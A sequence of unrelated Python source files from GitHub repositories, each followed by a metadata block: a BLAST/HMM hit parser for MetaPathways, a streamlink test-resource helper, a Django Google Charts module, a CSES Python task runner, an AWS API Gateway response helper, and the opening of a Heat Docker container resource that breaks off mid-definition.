    description = """This script parses BLAST/LAST or HMMSCAN search results of the amino acid sequences against the reference protein databases, in a tabular format."""
    parser = OptionParser(usage, epilog=description)

    parser.add_option("-i", "--input", dest="input", default=None,
                      help='the input blastout files [at least 1 REQUIRED]')
    parser.add_option("-o", "--output", dest="output", default=None,
                      help='the parsed output file [REQUIRED]')
    parser.add_option("-a", "--append", dest="append",
                      action="store_true", default=False,
                      help='open the output file in the append mode [OPTIONAL , default = False]')
    parser.add_option("-t", "--type", dest="input_type",
                      choices=['HMM', 'LAST1', 'LAST2'], default=None,
                      help='the type of input : HMMSCAN or LAST/BLAST output [REQUIRED]')
    parser.add_option("-l", "--list", dest="gene_list", default=None,
                      help='the list of genes to look for [REQUIRED]')
def check_arguments(opts, args):
    """Validate the required command-line options.

    Prints a message and returns False when any of input, output,
    input_type or gene_list is missing; returns True otherwise.
    (Python 2 code; the "sould" typo is in a runtime message.)
    """
    if opts.input == None:
        print "There sould be at least one input file"
        return False

    if opts.output == None:
        print "There sould be at least one output file"
        return False

    if opts.input_type == None:
        print "Input type not specified"
        return False

    if opts.gene_list==None:
        print "Gene/Enzyme name list not specified"
        return False

    return True
def create_query_dictionary(blastoutputfile, query_dictionary, algorithm, errorlogger= None ):
    """Collect the set of target ids (column 1) seen in a 12-column
    B/LAST tabular output file into query_dictionary (id -> True).

    Comment lines (starting with '#') and rows without exactly 12 columns
    are skipped. Read errors are logged and swallowed.
    """
    seq_beg_pattern = re.compile("^#")

    try:
        blastoutfh = open( blastoutputfile,'r')
    except:
        print "ERROR : cannot open B/LAST output file " + blastoutputfile + " to parse "
        return

    try:
        for line in blastoutfh:
            if not seq_beg_pattern.search(line):
                words = line.rstrip().split('\t')
                if len(words) != 12:
                    continue
                # NOTE(review): the BLAST and LAST branches below are
                # identical — both record words[1]; confirm whether LAST
                # was meant to use a different column.
                if algorithm =='BLAST':
                    if not words[1] in query_dictionary:
                        query_dictionary[words[1]] = True

                if algorithm =='LAST':
                    if not words[1] in query_dictionary:
                        query_dictionary[words[1]] = True

        blastoutfh.close()
    except:
        # Best-effort: log and continue with whatever was collected.
        eprintf("\nERROR : while reading B/LAST output file " + blastoutputfile + " to parse " +\
                " : make sure B/LAST ing was done for the particular database")

        if errorlogger:
            errorlogger.write("\nERROR : while reading B/LAST output file %s to parse\n" %(blastoutputfile))
            errorlogger.write("      : make sure B/LAST ing was done for the particular database\n")
        pass
def create_dictionary(databasemapfile, annot_map, query_dictionary, errorlogger= None):
    """Read a FASTA-style database map file and fill annot_map with
    {sequence name: annotation} for every name in query_dictionary.

    Header lines look like ">name annotation words..."; a header with no
    annotation words is recorded as 'hypothetical protein'. Exits the
    process when the map file cannot be opened or yields no annotations.

    Fixes over the original: the misspelled `errologger` name (a NameError
    whenever these error paths were hit) and the garbled "manuallyT" text.
    """
    if not query_dictionary:
        # Parenthesized single-argument print: identical output on py2/py3.
        print("WARNING : empty query dictionary in parse B/LAST")
        if errorlogger:
            errorlogger.write("WARNING : empty query dictionary in parse B/LAST\n")
        return

    seq_beg_pattern = re.compile(">")

    try:
        dbmapfile = open( databasemapfile,'r')
    except:
        if errorlogger:
            errorlogger.write("PARSE_BLAST\tERROR\tCannot open database map file %s\t Please check the file manually\n" %(databasemapfile) )
        exit_process("ERROR: Cannot open database map file %s\n" %(databasemapfile))

    for line in dbmapfile:
        if seq_beg_pattern.search(line):
            words = line.rstrip().split()
            name = words[0].replace('>','',1)
            # Only keep annotations for sequences that actually had hits.
            if not name in query_dictionary:
                continue
            words.pop(0)
            if len(words)==0:
                annotation = 'hypothetical protein'
            else:
                annotation = ' '.join(words)
            annot_map[name] = annotation
    dbmapfile.close()

    if len(annot_map)==0:
        if errorlogger:
            errorlogger.write( "PARSE_BLAST\tERROR\tFile "+databasemapfile+ " seems to be empty!\tCreate datbasemap file\n")
            errorlogger.write( "Try re-running after deleting file : %s\n" %(databasemapfile))
        exit_process( "no anntations in file :" + databasemapfile)
class BlastOutputParser(object):
    """Buffered iterator over a 12-column B/LAST tabular output file.

    Each next() yields a dict of the parsed hit fields (or None for rows
    that fail the cutoffs), annotated from the database map file and
    scored against reference bit scores.

    (Python 2 iterator: implements next(); py3 would need __next__.)
    """
    commentPATTERN = re.compile(r'^#')
    commentLAST_VERSION_PATTERN = re.compile(r'^#.*LAST[\s]+version[\s]+\d+')

    def create_refBitScores(self):
        """Load per-ORF reference bit scores from self.refscore_file.

        Raw scores are converted via (Lambda*S - ln k) / ln 2; unparsable
        scores fall back to 1.
        """
        refscorefile = open(self.refscore_file,'r')
        for line in refscorefile:
            words =[ x.strip() for x in line.split('\t') ]
            if len(words) == 2:
                orfid = ShortenORFId(words[0])
                try:
                    self.refBitScores[orfid]= int((self.Lambda*float(words[1]) - self.lnk )/self.ln2)
                except:
                    self.refBitScores[orfid]= int(1)
        refscorefile.close()

    def __init__(self, dbname, blastoutput, database_mapfile, refscore_file, opts, errorlogger =None):
        """Open the B/LAST output, load ref scores and annotations.

        Exits the process on any unreadable input file.
        """
        self.Size = 10000              # lines per read buffer
        self.dbname = dbname
        self.ln2 = 0.69314718055994530941
        self.lnk = math.log(opts.k)
        self.Lambda = opts.Lambda
        self.blastoutput = blastoutput
        self.database_mapfile =database_mapfile
        self.refscore_file = refscore_file
        self.annot_map = {}            # target id -> annotation text
        self.i=0                       # absolute line index into the file
        self.opts = opts
        self.hits_counts = {}          # query ORF -> hits kept so far
        self.data = {}
        self.refscores = {}            # NOTE(review): unused; refBitScores is the live map
        self.refBitScores = {}
        self.needToPermute = False;
        self.MAX_READ_ERRORS_ALLOWED = 10
        self.ERROR_COUNT = 0
        self.STEP_NAME  = 'PARSE_BLAST'
        self.error_and_warning_logger = errorlogger
        #print "trying to open blastoutput file " + blastoutput
        query_dictionary = {}
        create_query_dictionary(self.blastoutput, query_dictionary, self.opts.algorithm, errorlogger =  errorlogger)
        try:
            self.blastoutputfile = open(self.blastoutput,'r')
        except:
            eprintf("\nERROR : cannot open B/LAST output file " + blastoutput + " to parse "+\
                    "      : make sure \"B/LAST\"ing was done for the particular database" )
            if self.error_and_warning_logger:
                self.error_and_warning_logger.write("ERROR : cannot open B/LAST output file %s %s to parse \n" +\
                                                    "      : make sure \"B/LAST\"ing was done for "+\
                                                    "the particular database" %(blastoutput) )
            exit_process( "Cannot open B/LAST output file " + blastoutput )

        try:
            self.create_refBitScores()
        except:
            print traceback.print_exc(10)
            exit_process( "Error while reading from  B/LAST refscore file " + self.refscore_file )
        try:
            create_dictionary(database_mapfile, self.annot_map, query_dictionary)
            query_dictionary = {}
        except AttributeError:
            eprintf("Cannot read the map file for database : %s\n" % (dbname))
            if errorlogger!= None:
                errorlogger.write("PARSE_BLAST\tERROR\tCannot read the map file %s for database : %s\tDelete the formatted files for the database in the \"formatted\" folder\n" %(database_mapfile, dbname))
            exit_process("Cannot read the map file for database  " + dbname)

    def setMaxErrorsLimit(self, max):
        """Set how many missing-annotation errors are tolerated."""
        self.MAX_READ_ERRORS_ALLOWED = max

    def setErrorAndWarningLogger(self, logger):
        """Replace the error/warning logger."""
        self.error_and_warning_logger = logger

    def setSTEP_NAME(self, step_name):
        """Set the pipeline step name used in log prefixes."""
        self.STEP_NAME = step_name

    def incErrorCount(self):
        """Count one missing-annotation error."""
        self.ERROR_COUNT += 1

    def maxErrorsReached(self):
        """True once the error budget is exceeded."""
        return (self.ERROR_COUNT > self.MAX_READ_ERRORS_ALLOWED)

    def __iter__(self):
        return self

    def permuteForLAST(self, words):
        """Reorder a LAST-format row in place into the BLAST column layout
        (query, target, %id, aln length, ..., evalue, score)."""
        try :
            temp = copy(words)
            words[0] = temp[6] # query
            words[1] = temp[1] # target
            words[2] = 100.0 # percent id
            words[3] = temp[3]  #aln length
            words[6] = temp[2]
            words[7] = int(temp[2]) + int(temp[3]) - 1
            words[10] = 0.0 # evalue
            words[11] = temp[0]
        except:
            eprintf("ERROR : Invalid B/LAST output file %s \n" % (self.blastoutput))
            if self.error_and_warning_logger:
                self.error_and_warning_logger.write("ERROR : Invalid B/LAST output file" %(self.blastoutput))
            exit_process( "ERROR : Invalid B/LAST output file %s " % (self.blastoutput))

    def refillBuffer(self):
        """Read up to self.Size non-comment lines into self.lines."""
        i = 0
        self.lines = []
        line = True # self.blastoutputfile.readline()
        while line and i < self.Size:
            line=self.blastoutputfile.readline()
            if self.commentPATTERN.match(line):
                # NOTE(review): re.match returns None or a Match object,
                # never False, so `== False` below is always False and
                # needToPermute is never set here — LAST outputs are not
                # permuted. Probable intended test: whether the comment
                # is (or is not) a "# LAST version N" line. Confirm intent
                # before fixing.
                if self.commentLAST_VERSION_PATTERN.match(line) ==False:
                    self.needToPermute = True
                continue
            self.lines.append(line)
            if not line:
                break
            i += 1
        self.size = len(self.lines)

    def next(self):
        """Return the parsed dict for the next row passing all cutoffs,
        None for a rejected row, or raise StopIteration at EOF."""
        if self.i % self.Size ==0:
            self.refillBuffer()

        if self.i % self.Size < self.size:
            words = [ x.strip()  for x in self.lines[self.i % self.Size].rstrip().split('\t')]

            if len(words) != 12:
                self.i = self.i + 1
                return None
            '''shorten the ORF id'''
            words[0] = ShortenORFId(words[0])
            #if self.opts.algorithm =='LAST':
            if self.needToPermute:
                self.permuteForLAST(words)

            if not words[0] in self.hits_counts:
                self.hits_counts[words[0]] = 0

            # Enforce the per-query hit limit.
            if self.hits_counts[words[0]] >= self.opts.limit:
                self.i = self.i + 1
                return None

            if len(words) != 12 or not self.isWithinCutoffs(words, self.data, self.opts, self.annot_map, self.refBitScores):
                self.i = self.i + 1
                return None

            self.hits_counts[words[0]] += 1
            self.i = self.i + 1
            try:
                return self.data
            except:
                return None
        else:
            self.blastoutputfile.close()
            raise StopIteration()

    def isWithinCutoffs(self, words, data, cutoffs, annot_map, refbitscores):
        """Populate *data* from a 12-column row and apply the cutoffs.

        Returns True when the hit passes length/score/evalue/identity/bsr
        thresholds; also extracts EC number and (optionally) taxonomy from
        the annotation text.
        """
        try:
            # NOTE(review): `ShortORFId` is a typo for ShortenORFId, so
            # this always raises NameError and takes the except branch.
            # Harmless in practice: words[0] was already shortened in
            # next(), which is exactly what the fallback uses.
            orfid = ShortORFId(words[0])
        except:
            orfid = words[0]

        data['query'] = orfid

        try:
            data['target'] = words[1]
        except:
            data['target'] = 0

        try:
            data['q_length'] = int(words[7]) - int(words[6]) + 1
        except:
            data['q_length'] = 0

        try:
            data['bitscore'] = float(words[11])
        except:
            data['bitscore'] = 0

        try:
            data['bsr'] = float(words[11])/refbitscores[orfid]
        except:
            #print "words 0 " + str(refscores[words[0]])
            #print "words 11 " + str( words[11])
            data['bsr'] = 0

        try:
            data['expect'] = float(words[10])
        except:
            data['expect'] = 0

        try:
            data['aln_length'] = float(words[3])
        except:
            data['aln_length'] = 0

        try:
            data['identity'] = float(words[2])
        except:
            data['identity'] = 0

        try:
            data['product'] = annot_map[words[1]]
        except:
            eprintf("Sequence with name \"" + words[1] + "\" is not present in map file\n")
            if self.error_and_warning_logger:
                self.error_and_warning_logger.write("Sequence with name %s is not present in map file " %(words[1] ))
            self.incErrorCount()
            if self.maxErrorsReached():
                if self.error_and_warning_logger:
                    self.error_and_warning_logger.write("Number of sequence absent in map file %s exceeds %d" %(self.blastoutput, self.ERROR_COUNT ))
                exit_process("Number of sequence absent in map file %s exceeds %d" %(self.blastoutput, self.ERROR_COUNT ))
            data['product'] = 'hypothetical protein'

        try:
            # EC number embedded in the product text, e.g. 1.2.3.4
            m = re.search(r'(\d+[.]\d+[.]\d+[.]\d+)', data['product'])
            if m != None:
                data['ec'] = m.group(0)
            else:
                data['ec'] = ''
        except:
            data['ec'] = ''

        if cutoffs.taxonomy:
            try:
                # Taxonomy is the bracketed suffix of the product text.
                m = re.search(r'\[([^\[]+)\]', data['product'])
                if m != None:
                    data['taxonomy'] = m.group(1)
                else:
                    data['taxonomy'] = ''
            except:
                data['taxonomy'] = ''

        if cutoffs.remove_taxonomy:
            try:
                data['product'] = re.sub(r'\[([^\[]+)\]','', data['product'])
            except:
                data['product'] = ''

        if cutoffs.remove_ec:
            try:
                data['product'] = re.sub(r'\([Ee][Cc][:]\d+[.]\d+[.]\d+[.]\d+\)', '', data['product'])
                data['product'] = re.sub(r'\[[Ee][Cc][:]\d+[.]\d+[.]\d+[.]\d+\]', '', data['product'])
                data['product'] = re.sub(r'\[[Ee][Cc][:]\d+[.]\d+[.]\d+[.-]\]', '', data['product'])
                data['product'] = re.sub(r'\[[Ee][Cc][:]\d+[.]\d+[.-.-]\]', '', data['product'])
                data['product'] = re.sub(r'\[[Ee][Cc][:]\d+[.-.-.-]\]', '', data['product'])
            except:
                data['product'] = ''

        # Reject the hit when any threshold fails.
        if data['q_length'] < cutoffs.min_length:
            return False

        if data['bitscore'] < cutoffs.min_score:
            return False

        if data['expect'] > cutoffs.max_evalue:
            return False

        if data['identity'] < cutoffs.min_identity:
            return False

        if data['bsr'] < cutoffs.min_bsr:
            return False

        #min_length'
        #'min_score'
        #'max_evalue'
        # 'min_identity'
        #'limit'
        #'max_length'
        #'min_query_coverage'
        #'max_gaps'
        #min_bsr'
        return True
def read_gene_list(gene_list):
    """Read newline-separated gene names from file *gene_list* and return
    the unique names.

    Fixes over the original: no longer shadows the builtin `list`, and the
    file handle is closed via a context manager even on error.
    """
    unique_genes = {}
    with open(gene_list, 'r') as inputfile:
        for line in inputfile:
            unique_genes[line.strip()] = True
    return list(unique_genes)
rePATT1 = re.compile(r'/')
# BUGFIX: was re.compile(r'|'), which matches the empty string everywhere
# (always true). Escaping is behavior-identical: splitting on an absent
# '|' is a no-op, so only strings actually containing '|' are affected.
rePATT2 = re.compile(r'\|')
rePATT3 = re.compile(r' ')

# check if the string has one of the genes
def find_gene_name(string, gene_list, gene_dict):
    """Return the first '/'-, '|'- or space-delimited token of *string*
    (lower-cased) that is a key of gene_dict, or None.

    Tokens accumulate across the three split passes, so composite tokens
    (e.g. "b c" from "a/b c") are also tested, as in the original.
    `gene_list` is unused; kept for interface compatibility.

    Fixes over the original: the always-true r'|' pattern, removal of the
    dead `_field_dic = {}` typo assignments, and materializing dict keys
    before iterating (the original mutated the dict while iterating its
    keys view, which crashes on Python 3).
    """
    fields = [ string.strip().lower() ]
    seen_tokens = {}

    if rePATT1.search(string):
        for field in fields:
            for token in (x.strip() for x in field.split('/') if len(x.strip())):
                seen_tokens[token] = True
        fields = list(seen_tokens)

    if rePATT2.search(string):
        for field in fields:
            for token in (x.strip() for x in field.split('|') if len(x.strip())):
                seen_tokens[token] = True
        fields = list(seen_tokens)

    if rePATT3.search(string):
        for field in fields:
            for token in (x.strip() for x in field.split(' ') if len(x.strip())):
                seen_tokens[token] = True
        fields = list(seen_tokens)

    for word in fields:
        if word in gene_dict:
            return word
    return None
# check if the hmm hit is in the list
def find_hmm_name(string, gene_list, gene_dict):
    """Return *string* unchanged when it is a key of gene_dict, else None.

    `gene_list` is unused; kept for interface compatibility.
    """
    return string if string in gene_dict else None
# parse the search results and write out "ORF <tab> gene name" pairs
def process_input(input, output, input_type , gene_list, append, errorlogger = None):
    """Scan a tabular search-result file for hits matching the gene list
    and write one "orfid<TAB>gene" line per kept hit.

    :param input: path to the HMM/LAST1/LAST2 tabular result file
    :param output: path of the parsed output file
    :param input_type: 'HMM', 'LAST1' or 'LAST2' (selects column layout)
    :param gene_list: path to the newline-separated gene-name list
    :param append: open the output in append mode instead of overwrite
    :returns: number of lines written

    Fixes over the original: the except branch referenced undefined names
    (`soutput_blastoutput_parsed_tmp`, `dbname`) with a mismatched format
    string, and `count` was returned but never incremented (callers log it
    as the number of hits).
    """
    commentPATT = re.compile(r'^#')

    count = 0
    mode = 'w'
    if append:
        mode = 'a'

    gene_list = read_gene_list(gene_list)
    # lower-cased name -> original-cased name, for case-insensitive matching
    gene_dict = {}
    for gene in gene_list:
        gene_dict[gene.lower()] = gene

    # Column positions of the query ORF (q) and the hit target (t).
    if input_type=='LAST2':
        q = 0
        t = 9

    if input_type=='LAST1':
        q = 0
        t = 1

    if input_type=='HMM':
        q = 2
        t = 0

    try:
        inputfile = open(input, 'r')
        outputfile = open(output, mode)
    except IOError:
        if errorlogger:
            errorlogger.write("PARSE_BLAST\tERROR\tCannot open input file %s or output file %s\n" %(input, output))
        exit_process("PARSE_BLAST\tERROR\tCannot open input file %s or output file %s\n" %(input, output))

    for line in inputfile:
        if commentPATT.search(line):
            continue
        fields = [ x.strip() for x in line.split('\t') ]
        if len(fields) < 3:
            continue
        orfid = fields[q]
        target = find_gene_name(fields[t], gene_list, gene_dict)
        if target is None:
            continue
        fprintf(outputfile, "%s\t%s\n", orfid, gene_dict[target])
        count += 1

    outputfile.close()
    inputfile.close()
    return count
# the main function
def main(argv, errorlogger = None, runstatslogger = None):
    """Parse *argv* with the module parser, validate, and run the search."""
    global parser

    (opts, args) = parser.parse_args(argv)
    if not check_arguments(opts, args):
        print usage
        sys.exit(0)

    if errorlogger:
        errorlogger.write("#STEP\tPARSE_BLAST\n")

    unique_count = process_input(opts.input, opts.output, opts.input_type , opts.gene_list, opts.append, errorlogger = errorlogger)

    if runstatslogger:
        # NOTE(review): `priority`, `dbname`, `count`, `priority1` and
        # `opts.algorithm` are not defined anywhere in this script — this
        # branch raises NameError/AttributeError whenever a runstatslogger
        # is supplied. Confirm the intended values before enabling.
        runstatslogger.write("%s\tTotal Protein Annotations %s (%s)\t%s\n" %( str(priority), dbname, opts.algorithm,  str(count)))
        runstatslogger.write("%s\tNumber of ORFs with hits in %s (%s)\t%s\n" %( str(priority1), dbname, opts.algorithm, str(unique_count)))
def MetaPathways_parse_blast(argv, errorlogger = None, runstatslogger = None):
    """Pipeline entry point: build the option parser, then delegate to main().

    Always returns the (0, '') success tuple expected by the pipeline driver.
    """
    createParser()
    main(argv,
         errorlogger=errorlogger,
         runstatslogger=runstatslogger)
    return (0, '')
# standalone entry point: run directly from the shell
if __name__ == "__main__":
    # build the option parser first, then parse the shell arguments
    createParser()
    main(sys.argv[1:])
| {
"content_hash": "ecae11476eaa06ea2f7e4fbb4526effb",
"timestamp": "",
"source": "github",
"line_count": 585,
"max_line_length": 203,
"avg_line_length": 33.15042735042735,
"alnum_prop": 0.5450420254731089,
"repo_name": "Koonkie/MetaPathways_Python_Koonkie.3.0",
"id": "613cf09d418c6792c95c41295161131b208d046a",
"size": "19442",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "libs/python_scripts/MetaPathways_parse_custom_hits.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "6380"
},
{
"name": "Perl",
"bytes": "321958"
},
{
"name": "Python",
"bytes": "1229127"
},
{
"name": "Shell",
"bytes": "2866"
}
],
"symlink_target": ""
} |
import codecs
import os.path
import xml.etree.ElementTree as ET
from contextlib import contextmanager
from io import BytesIO
import requests_mock
import six
# absolute path of this package directory; resource paths below are
# resolved relative to it
__here__ = os.path.abspath(os.path.dirname(__file__))
def _parse_xml(data, strip_ns=False):
    """Parse an XML document and return its root element.

    data     : the document as text (or as UTF-8 bytes)
    strip_ns : when True, remove the namespace prefix from every tag

    Raises ValueError (with a short snippet of the input) when parsing fails.
    """
    if six.PY2 and isinstance(data, six.text_type):
        data = data.encode("utf8")
    elif six.PY3 and isinstance(data, str):
        # BUGFIX: only encode text input -- bytearray(data, "utf8") raised a
        # TypeError when the caller already supplied bytes on Python 3.
        data = bytearray(data, "utf8")
    try:
        it = ET.iterparse(BytesIO(data))
        for _, el in it:
            if '}' in el.tag and strip_ns:
                # strip all namespaces
                el.tag = el.tag.split('}', 1)[1]
        return it.root
    except Exception as err:
        snippet = repr(data)
        if len(snippet) > 35:
            snippet = snippet[:35] + " ..."
        raise ValueError("Unable to parse XML: {0} ({1})".format(err, snippet))
@contextmanager
def text(path, encoding="utf8"):
    """Yield an open text handle for the test resource at *path* (relative
    to this package directory); the handle is closed on exit."""
    full_path = os.path.join(__here__, path)
    resource_fh = codecs.open(full_path, 'r', encoding=encoding)
    try:
        yield resource_fh
    finally:
        resource_fh.close()
@contextmanager
def xml(path, encoding="utf8"):
    """Yield the parsed root element (namespaces stripped) of the XML
    resource at *path*."""
    with text(path, encoding=encoding) as resource_fh:
        yield _parse_xml(resource_fh.read(), strip_ns=True)
@contextmanager
def mock_http(path, url, encoding="utf8"):
    """Serve the resource at *path* as the body of GET *url*, yielding the
    active requests_mock Mocker."""
    with text(path, encoding) as resource:
        body = resource.read()
        with requests_mock.Mocker() as mock:
            mock.get(url, text=body)
            yield mock
| {
"content_hash": "11c0d643cd19207b9e92e72fda279002",
"timestamp": "",
"source": "github",
"line_count": 50,
"max_line_length": 90,
"avg_line_length": 28.56,
"alnum_prop": 0.6162464985994398,
"repo_name": "beardypig/streamlink",
"id": "0a096e5c1694e326b4ecdb9801815f0f18ec36c5",
"size": "1428",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/resources/__init__.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "838"
},
{
"name": "Python",
"bytes": "1538432"
},
{
"name": "Shell",
"bytes": "18707"
}
],
"symlink_target": ""
} |
import json
from abc import abstractmethod
from django.utils.six import with_metaclass
from django.utils.html import format_html, mark_safe
from .utils import DateTimeEncoder, OptionsDict
class ChartMeta(type):
    """Metaclass that wraps a chart class's ``options`` dict in an
    OptionsDict and merges in the options of the first base class."""

    def __new__(cls, name, bases, attrs):
        if 'options' in attrs:
            merged = OptionsDict(attrs['options'])
            merged.inherit(getattr(bases[0], 'options', {}))
            attrs['options'] = merged
        return super(ChartMeta, cls).__new__(cls, name, bases, attrs)
class Chart(with_metaclass(ChartMeta, object)):
    """Base class for Google-Charts-backed charts.

    Subclasses set ``columns``, ``chart_type`` and ``options`` and must
    implement get_data(); rendering produces a JSON payload plus a
    placeholder <div> picked up by the client-side JavaScript.
    """

    options = {}
    columns = None
    chart_type = 'LineChart'

    @abstractmethod
    def get_data(self):
        """Return an iterable of data rows; subclasses must override."""
        raise NotImplementedError

    def chart_id(self):
        # NOTE(review): derived from hash(self), so the id is only stable
        # for the lifetime of this instance/process -- TODO confirm intended.
        return str(hash(self))

    def to_html(self):
        """Render the chart: a <script> tag holding the JSON data and a
        <div> carrying the configuration as data attributes."""
        payload = json.dumps(
            {
                'cols': self.columns,
                'rows': list(self.get_data()),
            },
            cls=DateTimeEncoder,
        )
        return format_html(
            "<script type='text/json' id='{0}'>{1}</script>"
            "<div "
            "data-chart-options='{2}'"
            "data-chart-id='{0}'"
            "data-chart-type='{3}'"
            "></div>",
            self.chart_id(),
            mark_safe(payload),
            json.dumps(self.options),
            self.chart_type,
        )

    def __str__(self):
        return self.to_html()

    # Python 2 unicode rendering delegates to the same implementation.
    __unicode__ = __str__
# class ComboChart(Chart):
#     chart_type = 'ComboChart'

# Concrete chart flavours: each subclass only overrides ``chart_type``,
# which selects the Google Charts renderer used on the client side.

class LineChart(Chart):
    chart_type = 'LineChart'

class GeoChart(Chart):
    chart_type = 'GeoChart'

class CoreChart(Chart):
    chart_type = 'CoreChart'

class AreaChart(Chart):
    chart_type = 'AreaChart'

class BarChart(Chart):
    chart_type = 'BarChart'

class BubbleChart(Chart):
    chart_type = 'BubbleChart'

class CandlestickChart(Chart):
    chart_type = 'CandlestickChart'

class Histogram(Chart):
    chart_type = 'Histogram'

class ColumnChart(Chart):
    chart_type = 'ColumnChart'

class PieChart(Chart):
    chart_type = 'PieChart'

class ScatterChart(Chart):
    chart_type = 'ScatterChart'

class SparklineChart(Chart):
    chart_type = 'SparklineChart'

class SteppedAreaChart(Chart):
    chart_type = 'SteppedAreaChart'
| {
"content_hash": "1fd8d2d0c81a5017a17fad410ec58399",
"timestamp": "",
"source": "github",
"line_count": 114,
"max_line_length": 69,
"avg_line_length": 19.87719298245614,
"alnum_prop": 0.6015004413062666,
"repo_name": "danpalmer/django-google-charts",
"id": "6ed9977468b6aa79181b08ea520fe9e3616a141d",
"size": "2266",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_google_charts/charts.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "1207"
},
{
"name": "Python",
"bytes": "8878"
}
],
"symlink_target": ""
} |
import shutil
from cses.tasks.base import Base
# Source stub handed to Base for new submissions; the {0} placeholder is
# presumably filled with the task identifier by the base class -- TODO confirm.
template = """#!/usr/bin/env python3
# task: {0}
"""
class Py3Task(Base):
    """Task runner for Python 3 submissions (file extension ``py3``)."""

    def __init__(self):
        super().__init__("Python3", ["py3"], template)

    def _prepare(self, filename):
        """Copy the submission into place; Python needs no compile step, so
        report empty output and a zero status."""
        destination = self.getfile()
        shutil.copy2(filename, destination)
        return "", "", 0

    def _run_cmd(self, filename):
        """Command line used to execute the prepared file."""
        return ["python3", filename]
| {
"content_hash": "4ac4893cc655ae65edc8f8e2a56acd11",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 54,
"avg_line_length": 21.22222222222222,
"alnum_prop": 0.5837696335078534,
"repo_name": "JuhaniImberg/cses.py",
"id": "14018237835d8409e25d4dc4bff2a1a8e9f98d59",
"size": "382",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cses/tasks/py3.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "30397"
}
],
"symlink_target": ""
} |
import string
import logging
from setup_logger import create_logger
# module-level logger shared by all helpers in this file
logger = create_logger(name="aws_api_tools.py")
def api_response(statusCode=500, headers=None, body='Internal Service Error'):
    """Build the response dict shape expected by API Gateway proxy
    integrations.

    statusCode : HTTP status code; must lie in the 100-599 range
    headers    : response headers (defaults to Content-Type: text/html)
    body       : response body string

    Raises ValueError when statusCode is outside 100-599.
    """
    # BUGFIX: the header dict used to be a mutable default argument shared
    # across every call; a caller mutating it would poison later responses.
    if headers is None:
        headers = {'Content-Type': 'text/html'}
    if statusCode < 100 or statusCode > 599:
        raise ValueError('Invalid HTTP statusCode')
    return_value = {
        'statusCode': statusCode,
        'headers': headers,
        'body': body,
    }
    logger.debug(return_value)
    return return_value
def get_domain_from_proxy_api_gateway(event):
    """Reconstruct the external base URL of the request described by an
    API Gateway proxy event.

    Direct test invocations carry no headers and receive a fixed stub URL.
    Requests on the default amazonaws.com endpoint include the deployment
    stage in the path; custom domains do not.
    """
    headers = event['headers']
    if headers is None:
        return "https://testinvocation/approve"
    host = headers['Host']
    if 'amazonaws.com' not in host:
        return "https://{domain}/".format(domain=host)
    stage = event['requestContext']['stage']
    return "https://{domain}/{stage}/".format(domain=host, stage=stage)
def api_website(website_body='', safe_substitute_dict=None):
    """Render an HTML page, substituting $variables, and wrap it in a
    200 api_response().

    website_body         : the page template; a demo page is used when empty
    safe_substitute_dict : mapping of template variable -> replacement value
                           (defaults to {'domain': 'http://example.domain'})

    Raises ValueError when a supplied variable has no matching $placeholder
    in the supplied body.
    """
    # BUGFIX: the substitution dict used to be a mutable default argument
    # shared across every call to this function.
    if safe_substitute_dict is None:
        safe_substitute_dict = {'domain': 'http://example.domain'}
    logger.debug(website_body)
    logger.debug(safe_substitute_dict)
    body = website_body if website_body else \
    """
    <html>
        <body>
        <title>Webpage serverd from API Gateway and Lambda</title>
        <h1>This is an example of an HTTP Get Responses for a Lambda/API Gateway served website</h1>
        The domain is: $domain
        </body>
    </html>
    """
    logger.debug(body)
    # Validation only runs when the caller supplied both a body and
    # substitutions; every variable must appear as $variable in the body.
    if website_body and safe_substitute_dict:
        for variable in safe_substitute_dict:
            if '${variable}'.format(variable=variable) not in body:
                logger.debug('${variable}'.format(variable=variable))
                raise ValueError('A variable to be replaced in the body must be represented by a $variable')
    compiled_body = string.Template(body).safe_substitute(safe_substitute_dict)
    logger.debug(compiled_body)
    return api_response(statusCode=200, body=compiled_body)
| {
"content_hash": "eb6cc6d0c298798c376984d04ef22cd7",
"timestamp": "",
"source": "github",
"line_count": 58,
"max_line_length": 108,
"avg_line_length": 35.224137931034484,
"alnum_prop": 0.6079295154185022,
"repo_name": "1Strategy/security-fairy",
"id": "25d6505de5398b4d3ecf70177ac1a207334d307b",
"size": "2043",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "aws_api_tools.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "112759"
}
],
"symlink_target": ""
} |
import distutils
from oslo_log import log as logging
import six
from heat.common import exception
from heat.common.i18n import _
from heat.common.i18n import _LW
from heat.engine import attributes
from heat.engine import constraints
from heat.engine import properties
from heat.engine import resource
from heat.engine import support
LOG = logging.getLogger(__name__)

# Flipped to True below once docker-py imports successfully.
DOCKER_INSTALLED = False
# Minimum docker-py API version required by each optional property.
MIN_API_VERSION_MAP = {'read_only': '1.17', 'cpu_shares': '1.8',
                       'devices': '1.14', 'cpu_set': '1.12'}
# Device mappings must be absolute paths under /dev.
DEVICE_PATH_REGEX = r"^/dev/[/_\-a-zA-Z0-9]+$"

# conditionally import so tests can work without having the dependency
# satisfied
try:
    import docker
    DOCKER_INSTALLED = True
except ImportError:
    docker = None
class DockerContainer(resource.Resource):
    """Heat resource that manages the lifecycle of a single Docker
    container: create/start, delete, suspend/resume, and attribute
    resolution via docker inspect/logs."""

    support_status = support.SupportStatus(
        status=support.UNSUPPORTED,
        message=_('This resource is not supported, use at your own risk.'))

    # Template property names, paired 1:1 with their string keys below.
    PROPERTIES = (
        DOCKER_ENDPOINT, HOSTNAME, USER, MEMORY, PORT_SPECS,
        PRIVILEGED, TTY, OPEN_STDIN, STDIN_ONCE, ENV, CMD, DNS,
        IMAGE, VOLUMES, VOLUMES_FROM, PORT_BINDINGS, LINKS, NAME,
        RESTART_POLICY, CAP_ADD, CAP_DROP, READ_ONLY, CPU_SHARES,
        DEVICES, CPU_SET
